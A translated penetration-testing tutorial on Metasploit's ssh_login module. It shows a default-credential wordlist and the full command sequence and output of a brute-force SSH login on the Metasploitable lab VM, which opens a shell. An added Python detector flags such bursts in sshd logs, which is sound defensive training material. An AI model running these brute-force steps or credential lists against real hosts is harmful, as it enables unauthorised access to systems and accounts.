Ssh/ssh login
From www.metasploit-es.com.ar
The ssh_login module is quite versatile: it can not only test a set of credentials across a range of IP addresses, but also perform brute-force login attempts. We will pass the module a file containing usernames and passwords, separated by a space, as shown below.
root@bt:~# head /opt/metasploit3/msf3/data/wordlists/root_userpass.txt
root
root !root
root Cisco
root NeXT
root QNX
root admin
root attack
root ax400
root bagabu
root blablabla
Next, we load the scanner module in Metasploit and set USERPASS_FILE to point to our list of credentials to test.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.154
RHOSTS => 192.168.1.154
msf auxiliary(ssh_login) > set USERPASS_FILE /opt/metasploit3/msf3/data/wordlists/root_userpass.txt
USERPASS_FILE => /opt/metasploit3/msf3/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false
With everything ready, we run the module. When a valid pair of credentials is found, we are presented with a shell on the remote machine.
msf auxiliary(ssh_login) > run

[*] 192.168.1.154:22 - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2010-09-09 17:25:18 -0600
[+] 192.168.1.154:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login) >
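On the target side, a run like the one above shows up in the sshd log as a burst of failed password attempts from one source, followed by an accepted login. The following is an added example, not part of the original page or of Metasploit: a small detector for that pattern, assuming the usual OpenSSH syslog message format; the log lines, source addresses, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd syslog lines (not from the original page); both source
# addresses are made up. Assumes the usual OpenSSH "Failed/Accepted password" format.
SAMPLE_LOG = """\
Sep  9 17:25:10 metasploitable sshd[4301]: Failed password for root from 192.168.1.10 port 40201 ssh2
Sep  9 17:25:11 metasploitable sshd[4302]: Failed password for root from 192.168.1.10 port 40202 ssh2
Sep  9 17:25:12 metasploitable sshd[4303]: Failed password for root from 192.168.1.10 port 40203 ssh2
Sep  9 17:25:13 metasploitable sshd[4304]: Failed password for invalid user test from 192.168.1.20 port 51000 ssh2
Sep  9 17:25:14 metasploitable sshd[4305]: Failed password for root from 192.168.1.10 port 40204 ssh2
Sep  9 17:25:15 metasploitable sshd[4306]: Failed password for root from 192.168.1.10 port 40205 ssh2
Sep  9 17:25:18 metasploitable sshd[4307]: Accepted password for msfadmin from 192.168.1.10 port 40206 ssh2
Sep  9 17:30:00 metasploitable sshd[4308]: Accepted password for alice from 192.168.1.20 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

def parse(line, year=2010):
    """Return (timestamp, result, user, source) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year, so the caller supplies one.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failures inside window, and any account
    that source logged in to while the burst was still inside the window."""
    recent = defaultdict(list)  # source -> failure timestamps still in window
    alerts = {}
    for event in filter(None, map(parse, log_text.splitlines())):
        ts, result, user, src = event
        recent[src] = [t for t in recent[src] if ts - t <= window]
        if result == "Failed":
            recent[src].append(ts)
            if len(recent[src]) >= threshold:
                alert = alerts.setdefault(src, {"failures": 0, "compromised": []})
                alert["failures"] = max(alert["failures"], len(recent[src]))
        elif src in alerts and recent[src]:
            # Accepted login right after a flagged burst: treat as a guessed password.
            alerts[src]["compromised"].append(user)
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

An account listed under "compromised" should have its password reset and its sessions reviewed; disabling password authentication in favour of keys removes this guessing surface altogether.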
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999